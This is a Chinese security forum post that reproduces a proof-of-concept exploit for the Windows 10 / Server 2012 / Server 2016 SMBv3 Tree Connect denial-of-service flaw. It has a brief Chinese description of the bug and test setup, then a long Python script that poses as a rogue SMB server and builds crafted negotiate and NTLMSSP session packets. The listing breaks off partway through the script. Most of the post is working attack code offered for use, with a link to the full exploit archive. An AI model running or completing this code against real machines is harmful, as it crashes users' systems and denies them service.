搜索
中国白客联盟»论坛 Techniques 0day及EXP(0day and POC) Microsoft Windows 10 - SMBv3 Tree Connect (PoC)
返回列表 发新帖
查看: 675|回复: 0

Microsoft Windows 10 - SMBv3 Tree Connect (PoC)

[复制链接]
admin

1839

主题

2255

帖子

1万

积分

管理员

Rank: 9Rank: 9Rank: 9

积分
11913
发表于 2017-2-3 21:16:08 | 显示全部楼层 |阅读模式
1 漏洞简介:
SMB 是一个网络文件共享协议,它允许应用程序和终端用户从远端的文件服务器 访问文件资源。就在近日,国外研究员公布了一个 SMB 3.0 协议的 0day 漏洞, 能够造成系统的拒绝服务,目前还没有更详细的漏洞细节披露。
2 漏洞影响:
攻击者可通过诱使用户访问伪造的SMB服务端,从而进行拒绝服务攻击,最终危 害到用户的系统。
3 影响版本:
Windows Server 2012 Windows Server 2016 Windows 10 其它版本可能也受影响。
4 环境搭建
PoC 运行的服务端:Ubuntu 16.04 x64
测试客户端:Windows 10 x64
5 漏洞复现
在 Ubuntu 下执行 PoC 脚本来模拟 SMB 服务端并等待客户端的连接:
在客户端 Windows 10 上访问该 SMB 服务端:
最终将触发漏洞从而导致系统的崩溃:
  1. # Full Proof of Concept:
  2. # https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/41222.zip

  4. import sys, struct, SocketServer
  5. from odict import OrderedDict
  6. from datetime import datetime
  7. from calendar import timegm

  9. class Packet():
  10.     fields = OrderedDict([
  11.         ("data", ""),
  12.     ])
  13.     def __init__(self, **kw):
  14.         self.fields = OrderedDict(self.__class__.fields)
  15.         for k,v in kw.items():
  16.             if callable(v):
  17.                 self.fields[k] = v(self.fields[k])
  18.             else:
  19.                 self.fields[k] = v
  20.     def __str__(self):
  21.         return "".join(map(str, self.fields.values()))

  23. def NTStamp(Time):
  24.     NtStamp = 116444736000000000 + (timegm(Time.timetuple()) * 10000000)
  25.     return struct.pack("Q", NtStamp + (Time.microsecond * 10))

  27. def longueur(payload):
  28.     length = struct.pack(">i", len(''.join(payload)))
  29.     return length

  31. def GrabMessageID(data):
  32.     Messageid = data[28:36]
  33.     return Messageid

  35. def GrabCreditRequested(data):
  36.     CreditsRequested = data[18:20]
  37.     if CreditsRequested == "\x00\x00":
  38.        CreditsRequested =  "\x01\x00"
  39.     else:
  40.        CreditsRequested = data[18:20]
  41.     return CreditsRequested

  43. def GrabCreditCharged(data):
  44.     CreditCharged = data[10:12]
  45.     return CreditCharged

  47. def GrabSessionID(data):
  48.     SessionID = data[44:52]
  49.     return SessionID

  51. ##################################################################################
  52. class SMBv2Header(Packet):
  53.     fields = OrderedDict([
  54.         ("Proto",         "\xfe\x53\x4d\x42"),
  55.         ("Len",           "\x40\x00"),
  56.         ("CreditCharge",  "\x00\x00"),
  57.         ("NTStatus",      "\x00\x00\x00\x00"),
  58.         ("Cmd",           "\x00\x00"),
  59.         ("Credits",       "\x01\x00"),
  60.         ("Flags",         "\x01\x00\x00\x00"),
  61.         ("NextCmd",       "\x00\x00\x00\x00"),
  62.         ("MessageId",     "\x00\x00\x00\x00\x00\x00\x00\x00"),
  63.         ("PID",           "\xff\xfe\x00\x00"),
  64.         ("TID",           "\x00\x00\x00\x00"),
  65.         ("SessionID",     "\x00\x00\x00\x00\x00\x00\x00\x00"),
  66.         ("Signature",     "\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"),
  67.     ])

  69. ##################################################################################
  70. class SMB2NegoAns(Packet):
  71.         fields = OrderedDict([
  72.                 ("Len",             "\x41\x00"),
  73.                 ("Signing",         "\x01\x00"),
  74.                 ("Dialect",         "\xff\x02"),
  75.                 ("Reserved",        "\x00\x00"),
  76.                 ("Guid",            "\xea\x85\xab\xf1\xea\xf6\x0c\x4f\x92\x81\x92\x47\x6d\xeb\x72\xa9"),
  77.                 ("Capabilities",    "\x07\x00\x00\x00"),
  78.                 ("MaxTransSize",    "\x00\x00\x10\x00"),
  79.                 ("MaxReadSize",     "\x00\x00\x10\x00"),
  80.                 ("MaxWriteSize",    "\x00\x00\x10\x00"),
  81.                 ("SystemTime",      NTStamp(datetime.now())),
  82.                 ("BootTime",        "\x22\xfb\x80\x01\x40\x09\xd2\x01"),
  83.                 ("SecBlobOffSet",             "\x80\x00"),
  84.                 ("SecBlobLen",                "\x78\x00"),
  85.                 ("Reserved2",                 "\x4d\x53\x53\x50"),
  86.                 ("InitContextTokenASNId",     "\x60"),
  87.                 ("InitContextTokenASNLen",    "\x76"),
  88.                 ("ThisMechASNId",             "\x06"),
  89.                 ("ThisMechASNLen",            "\x06"),
  90.                 ("ThisMechASNStr",            "\x2b\x06\x01\x05\x05\x02"),
  91.                 ("SpNegoTokenASNId",          "\xA0"),
  92.                 ("SpNegoTokenASNLen",         "\x6c"),
  93.                 ("NegTokenASNId",             "\x30"),
  94.                 ("NegTokenASNLen",            "\x6a"),
  95.                 ("NegTokenTag0ASNId",         "\xA0"),
  96.                 ("NegTokenTag0ASNLen",        "\x3c"),
  97.                 ("NegThisMechASNId",          "\x30"),
  98.                 ("NegThisMechASNLen",         "\x3a"),
  99.                 ("NegThisMech1ASNId",         "\x06"),
  100.                 ("NegThisMech1ASNLen",        "\x0a"),
  101.                 ("NegThisMech1ASNStr",        "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x1e"),
  102.                 ("NegThisMech2ASNId",         "\x06"),
  103.                 ("NegThisMech2ASNLen",        "\x09"),
  104.                 ("NegThisMech2ASNStr",        "\x2a\x86\x48\x82\xf7\x12\x01\x02\x02"),
  105.                 ("NegThisMech3ASNId",         "\x06"),
  106.                 ("NegThisMech3ASNLen",        "\x09"),
  107.                 ("NegThisMech3ASNStr",        "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02"),
  108.                 ("NegThisMech4ASNId",         "\x06"),
  109.                 ("NegThisMech4ASNLen",        "\x0a"),
  110.                 ("NegThisMech4ASNStr",        "\x2a\x86\x48\x86\xf7\x12\x01\x02\x02\x03"),
  111.                 ("NegThisMech5ASNId",         "\x06"),
  112.                 ("NegThisMech5ASNLen",        "\x0a"),
  113.                 ("NegThisMech5ASNStr",        "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
  114.                 ("NegTokenTag3ASNId",         "\xA3"),
  115.                 ("NegTokenTag3ASNLen",        "\x2a"),
  116.                 ("NegHintASNId",              "\x30"),
  117.                 ("NegHintASNLen",             "\x28"),
  118.                 ("NegHintTag0ASNId",          "\xa0"),
  119.                 ("NegHintTag0ASNLen",         "\x26"),
  120.                 ("NegHintFinalASNId",         "\x1b"),
  121.                 ("NegHintFinalASNLen",        "\x24"),
  122.                 ("NegHintFinalASNStr",        "Server2009@SMB3.local"),
  123.                 ("Data",                      ""),
  124.         ])

  126.         def calculate(self):


  129.                 StructLen = str(self.fields["Len"])+str(self.fields["Signing"])+str(self.fields["Dialect"])+str(self.fields["Reserved"])+str(self.fields["Guid"])+str(self.fields["Capabilities"])+str(self.fields["MaxTransSize"])+str(self.fields["MaxReadSize"])+str(self.fields["MaxWriteSize"])+str(self.fields["SystemTime"])+str(self.fields["BootTime"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])+str(self.fields["Reserved2"])
  130.                  
  131.                 SecBlobLen = str(self.fields["InitContextTokenASNId"])+str(self.fields["InitContextTokenASNLen"])+str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])


  134.                 AsnLenStart = str(self.fields["ThisMechASNId"])+str(self.fields["ThisMechASNLen"])+str(self.fields["ThisMechASNStr"])+str(self.fields["SpNegoTokenASNId"])+str(self.fields["SpNegoTokenASNLen"])+str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])

  136.                 AsnLen2 = str(self.fields["NegTokenASNId"])+str(self.fields["NegTokenASNLen"])+str(self.fields["NegTokenTag0ASNId"])+str(self.fields["NegTokenTag0ASNLen"])+str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])+str(self.fields["NegTokenTag3ASNId"])+str(self.fields["NegTokenTag3ASNLen"])+str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])

  138.                 MechTypeLen = str(self.fields["NegThisMechASNId"])+str(self.fields["NegThisMechASNLen"])+str(self.fields["NegThisMech1ASNId"])+str(self.fields["NegThisMech1ASNLen"])+str(self.fields["NegThisMech1ASNStr"])+str(self.fields["NegThisMech2ASNId"])+str(self.fields["NegThisMech2ASNLen"])+str(self.fields["NegThisMech2ASNStr"])+str(self.fields["NegThisMech3ASNId"])+str(self.fields["NegThisMech3ASNLen"])+str(self.fields["NegThisMech3ASNStr"])+str(self.fields["NegThisMech4ASNId"])+str(self.fields["NegThisMech4ASNLen"])+str(self.fields["NegThisMech4ASNStr"])+str(self.fields["NegThisMech5ASNId"])+str(self.fields["NegThisMech5ASNLen"])+str(self.fields["NegThisMech5ASNStr"])

  140.                 Tag3Len = str(self.fields["NegHintASNId"])+str(self.fields["NegHintASNLen"])+str(self.fields["NegHintTag0ASNId"])+str(self.fields["NegHintTag0ASNLen"])+str(self.fields["NegHintFinalASNId"])+str(self.fields["NegHintFinalASNLen"])+str(self.fields["NegHintFinalASNStr"])

  142.                 #Sec Blob lens
  143.                 self.fields["SecBlobOffSet"] = struct.pack("<h",len(StructLen)+64)
  144.                 self.fields["SecBlobLen"] = struct.pack("<h",len(SecBlobLen))
  145.                 #ASN Stuff
  146.                 self.fields["InitContextTokenASNLen"] = struct.pack("<B", len(SecBlobLen)-2)
  147.                 self.fields["ThisMechASNLen"] = struct.pack("<B", len(str(self.fields["ThisMechASNStr"])))
  148.                 self.fields["SpNegoTokenASNLen"] = struct.pack("<B", len(AsnLen2))
  149.                 self.fields["NegTokenASNLen"] = struct.pack("<B", len(AsnLen2)-2)
  150.                 self.fields["NegTokenTag0ASNLen"] = struct.pack("<B", len(MechTypeLen))
  151.                 self.fields["NegThisMech1ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech1ASNStr"])))
  152.                 self.fields["NegThisMech2ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech2ASNStr"])))
  153.                 self.fields["NegThisMech3ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech3ASNStr"])))
  154.                 self.fields["NegThisMech4ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech4ASNStr"])))
  155.                 self.fields["NegThisMech5ASNLen"] = struct.pack("<B", len(str(self.fields["NegThisMech5ASNStr"])))
  156.                 self.fields["NegTokenTag3ASNLen"] = struct.pack("<B", len(Tag3Len))
  157.                 self.fields["NegHintASNLen"] = struct.pack("<B", len(Tag3Len)-2)
  158.                 self.fields["NegHintTag0ASNLen"] = struct.pack("<B", len(Tag3Len)-4)
  159.                 self.fields["NegHintFinalASNLen"] = struct.pack("<B", len(str(self.fields["NegHintFinalASNStr"])))

  161. ##################################################################################
  162. class SMB2Session1Data(Packet):
  163.         fields = OrderedDict([
  164.                 ("Len",             "\x09\x00"),
  165.                 ("SessionFlag",     "\x01\x00"),
  166.                 ("SecBlobOffSet",   "\x48\x00"),
  167.                 ("SecBlobLen",      "\x06\x01"),
  168.                 ("ChoiceTagASNId",        "\xa1"),
  169.                 ("ChoiceTagASNLenOfLen",  "\x82"),
  170.                 ("ChoiceTagASNIdLen",     "\x01\x02"),
  171.                 ("NegTokenTagASNId",      "\x30"),
  172.                 ("NegTokenTagASNLenOfLen","\x81"),
  173.                 ("NegTokenTagASNIdLen",   "\xff"),
  174.                 ("Tag0ASNId",             "\xA0"),
  175.                 ("Tag0ASNIdLen",          "\x03"),
  176.                 ("NegoStateASNId",        "\x0A"),
  177.                 ("NegoStateASNLen",       "\x01"),
  178.                 ("NegoStateASNValue",     "\x01"),
  179.                 ("Tag1ASNId",             "\xA1"),
  180.                 ("Tag1ASNIdLen",          "\x0c"),
  181.                 ("Tag1ASNId2",            "\x06"),
  182.                 ("Tag1ASNId2Len",         "\x0A"),
  183.                 ("Tag1ASNId2Str",         "\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a"),
  184.                 ("Tag2ASNId",             "\xA2"),
  185.                 ("Tag2ASNIdLenOfLen",     "\x81"),
  186.                 ("Tag2ASNIdLen",          "\xE9"),
  187.                 ("Tag3ASNId",             "\x04"),
  188.                 ("Tag3ASNIdLenOfLen",     "\x81"),
  189.                 ("Tag3ASNIdLen",          "\xE6"),
  190.                 ("NTLMSSPSignature",      "NTLMSSP"),
  191.                 ("NTLMSSPSignatureNull",  "\x00"),
  192.                 ("NTLMSSPMessageType",    "\x02\x00\x00\x00"),
  193.                 ("NTLMSSPNtWorkstationLen","\x1e\x00"),
  194.                 ("NTLMSSPNtWorkstationMaxLen","\x1e\x00"),
  195.                 ("NTLMSSPNtWorkstationBuffOffset","\x38\x00\x00\x00"),
  196.                 ("NTLMSSPNtNegotiateFlags","\x15\x82\x89\xe2"),
  197.                 ("NTLMSSPNtServerChallenge","\x82\x21\x32\x14\x51\x46\xe2\x83"),
  198.                 ("NTLMSSPNtReserved","\x00\x00\x00\x00\x00\x00\x00\x00"),
  199.                 ("NTLMSSPNtTargetInfoLen","\x94\x00"),
  200.                 ("NTLMSSPNtTargetInfoMaxLen","\x94\x00"),
  201.                 ("NTLMSSPNtTargetInfoBuffOffset","\x56\x00\x00\x00"),
  202.                 ("NegTokenInitSeqMechMessageVersionHigh","\x06"),
  203.                 ("NegTokenInitSeqMechMessageVersionLow","\x03"),
  204.                 ("NegTokenInitSeqMechMessageVersionBuilt","\x80\x25"),
  205.                 ("NegTokenInitSeqMechMessageVersionReserved","\x00\x00\x00"),
  206.                 ("NegTokenInitSeqMechMessageVersionNTLMType","\x0f"),
  207.                 ("NTLMSSPNtWorkstationName","SMB3"),
  208.                 ("NTLMSSPNTLMChallengeAVPairsId","\x02\x00"),
  209.                 ("NTLMSSPNTLMChallengeAVPairsLen","\x0a\x00"),
  210.                 ("NTLMSSPNTLMChallengeAVPairsUnicodeStr","SMB5"),
  211.                 ("NTLMSSPNTLMChallengeAVPairs1Id","\x01\x00"),
  212.                 ("NTLMSSPNTLMChallengeAVPairs1Len","\x1e\x00"),
  213.                 ("NTLMSSPNTLMChallengeAVPairs1UnicodeStr","WIN-PRH502RQAFV"),
  214.                 ("NTLMSSPNTLMChallengeAVPairs2Id","\x04\x00"),
  215.                 ("NTLMSSPNTLMChallengeAVPairs2Len","\x1e\x00"),
  216.                 ("NTLMSSPNTLMChallengeAVPairs2UnicodeStr","SMB5.local"),
  217.                 ("NTLMSSPNTLMChallengeAVPairs3Id","\x03\x00"),
  218.                 ("NTLMSSPNTLMChallengeAVPairs3Len","\x1e\x00"),
  219.                 ("NTLMSSPNTLMChallengeAVPairs3UnicodeStr","WIN-PRH502RQAFV.SMB5.local"),
  220.                 ("NTLMSSPNTLMChallengeAVPairs5Id","\x05\x00"),
  221.                 ("NTLMSSPNTLMChallengeAVPairs5Len","\x04\x00"),
  222.                 ("NTLMSSPNTLMChallengeAVPairs5UnicodeStr","SMB5.local"),
  223.                 ("NTLMSSPNTLMChallengeAVPairs7Id","\x07\x00"),
  224.                 ("NTLMSSPNTLMChallengeAVPairs7Len","\x08\x00"),
  225.                 ("NTLMSSPNTLMChallengeAVPairs7UnicodeStr",NTStamp(datetime.now())),
  226.                 ("NTLMSSPNTLMChallengeAVPairs6Id","\x00\x00"),
  227.                 ("NTLMSSPNTLMChallengeAVPairs6Len","\x00\x00"),
  228.         ])


  231.         def calculate(self):
  232.                 ###### Convert strings to Unicode
  233.                 self.fields["NTLMSSPNtWorkstationName"] = self.fields["NTLMSSPNtWorkstationName"].encode('utf-16le')
  234.                 self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"].encode('utf-16le')
  235.                 self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"].encode('utf-16le')
  236.                 self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"].encode('utf-16le')
  237.                 self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"].encode('utf-16le')
  238.                 self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"] = self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"].encode('utf-16le')
  239.                
  240.                 #Packet struct calc:
  241.                 StructLen = str(self.fields["Len"])+str(self.fields["SessionFlag"])+str(self.fields["SecBlobOffSet"])+str(self.fields["SecBlobLen"])
  242.                 ###### SecBlobLen Calc:
  243.                 CalculateSecBlob = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])+str(self.fields["NTLMSSPNtWorkstationName"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])

  245.                 AsnLen = str(self.fields["ChoiceTagASNId"])+str(self.fields["ChoiceTagASNLenOfLen"])+str(self.fields["ChoiceTagASNIdLen"])+str(self.fields["NegTokenTagASNId"])+str(self.fields["NegTokenTagASNLenOfLen"])+str(self.fields["NegTokenTagASNIdLen"])+str(self.fields["Tag0ASNId"])+str(self.fields["Tag0ASNIdLen"])+str(self.fields["NegoStateASNId"])+str(self.fields["NegoStateASNLen"])+str(self.fields["NegoStateASNValue"])+str(self.fields["Tag1ASNId"])+str(self.fields["Tag1ASNIdLen"])+str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])+str(self.fields["Tag2ASNId"])+str(self.fields["Tag2ASNIdLenOfLen"])+str(self.fields["Tag2ASNIdLen"])+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])


  248.                 #Packet Struct len
  249.                 self.fields["SecBlobLen"] = struct.pack("<H", len(AsnLen+CalculateSecBlob))
  250.                 self.fields["SecBlobOffSet"] = struct.pack("<h",len(StructLen)+64)

  252.                 ###### ASN Stuff
  253.                 if len(CalculateSecBlob) > 255:
  254.                    self.fields["Tag3ASNIdLen"] = struct.pack(">H", len(CalculateSecBlob))
  255.                 else:
  256.                    self.fields["Tag3ASNIdLenOfLen"] = "\x81"
  257.                    self.fields["Tag3ASNIdLen"] = struct.pack(">B", len(CalculateSecBlob))

  259.                 if len(AsnLen+CalculateSecBlob)-3 > 255:
  260.                    self.fields["ChoiceTagASNIdLen"] = struct.pack(">H", len(AsnLen+CalculateSecBlob)-4)
  261.                 else:
  262.                    self.fields["ChoiceTagASNLenOfLen"] = "\x81"
  263.                    self.fields["ChoiceTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-3)

  265.                 if len(AsnLen+CalculateSecBlob)-7 > 255:
  266.                    self.fields["NegTokenTagASNIdLen"] = struct.pack(">H", len(AsnLen+CalculateSecBlob)-8)
  267.                 else:
  268.                    self.fields["NegTokenTagASNLenOfLen"] = "\x81"
  269.                    self.fields["NegTokenTagASNIdLen"] = struct.pack(">B", len(AsnLen+CalculateSecBlob)-7)
  270.                
  271.                 tag2length = CalculateSecBlob+str(self.fields["Tag3ASNId"])+str(self.fields["Tag3ASNIdLenOfLen"])+str(self.fields["Tag3ASNIdLen"])

  273.                 if len(tag2length) > 255:
  274.                    self.fields["Tag2ASNIdLen"] = struct.pack(">H", len(tag2length))
  275.                 else:
  276.                    self.fields["Tag2ASNIdLenOfLen"] = "\x81"
  277.                    self.fields["Tag2ASNIdLen"] = struct.pack(">B", len(tag2length))

  279.                 self.fields["Tag1ASNIdLen"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2"])+str(self.fields["Tag1ASNId2Len"])+str(self.fields["Tag1ASNId2Str"])))
  280.                 self.fields["Tag1ASNId2Len"] = struct.pack(">B", len(str(self.fields["Tag1ASNId2Str"])))

  282.                 ###### Workstation Offset
  283.                 CalculateOffsetWorkstation = str(self.fields["NTLMSSPSignature"])+str(self.fields["NTLMSSPSignatureNull"])+str(self.fields["NTLMSSPMessageType"])+str(self.fields["NTLMSSPNtWorkstationLen"])+str(self.fields["NTLMSSPNtWorkstationMaxLen"])+str(self.fields["NTLMSSPNtWorkstationBuffOffset"])+str(self.fields["NTLMSSPNtNegotiateFlags"])+str(self.fields["NTLMSSPNtServerChallenge"])+str(self.fields["NTLMSSPNtReserved"])+str(self.fields["NTLMSSPNtTargetInfoLen"])+str(self.fields["NTLMSSPNtTargetInfoMaxLen"])+str(self.fields["NTLMSSPNtTargetInfoBuffOffset"])+str(self.fields["NegTokenInitSeqMechMessageVersionHigh"])+str(self.fields["NegTokenInitSeqMechMessageVersionLow"])+str(self.fields["NegTokenInitSeqMechMessageVersionBuilt"])+str(self.fields["NegTokenInitSeqMechMessageVersionReserved"])+str(self.fields["NegTokenInitSeqMechMessageVersionNTLMType"])

  285.                 ###### AvPairs Offset
  286.                 CalculateLenAvpairs = str(self.fields["NTLMSSPNTLMChallengeAVPairsId"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsLen"])+str(self.fields["NTLMSSPNTLMChallengeAVPairsUnicodeStr"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs2Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs3Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs5Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs7Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7Len"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])+(self.fields["NTLMSSPNTLMChallengeAVPairs6Id"])+str(self.fields["NTLMSSPNTLMChallengeAVPairs6Len"])

  288.                 ##### Workstation Offset Calculation:
  289.                 self.fields["NTLMSSPNtWorkstationBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation))
  290.                 self.fields["NTLMSSPNtWorkstationLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))
  291.                 self.fields["NTLMSSPNtWorkstationMaxLen"] = struct.pack("<h", len(str(self.fields["NTLMSSPNtWorkstationName"])))

  293.                 ##### Target Offset Calculation:
  294.                 self.fields["NTLMSSPNtTargetInfoBuffOffset"] = struct.pack("<i", len(CalculateOffsetWorkstation+str(self.fields["NTLMSSPNtWorkstationName"])))
  295.                 self.fields["NTLMSSPNtTargetInfoLen"] = struct.pack("<h", len(CalculateLenAvpairs))
  296.                 self.fields["NTLMSSPNtTargetInfoMaxLen"] = struct.pack("<h", len(CalculateLenAvpairs))
  297.                
  298.                 ##### IvPair Calculation:
  299.                 self.fields["NTLMSSPNTLMChallengeAVPairs7Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs7UnicodeStr"])))
  300.                 self.fields["NTLMSSPNTLMChallengeAVPairs5Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs5UnicodeStr"])))
  301.                 self.fields["NTLMSSPNTLMChallengeAVPairs3Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs3UnicodeStr"])))
  302.                 self.fields["NTLMSSPNTLMChallengeAVPairs2Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs2UnicodeStr"])))
  303.                 self.fields["NTLMSSPNTLMChallengeAVPairs1Len"] = struct.pack("<h", len(str(self.fields["NTLMSSPNTLMChallengeAVPairs1UnicodeStr"])))
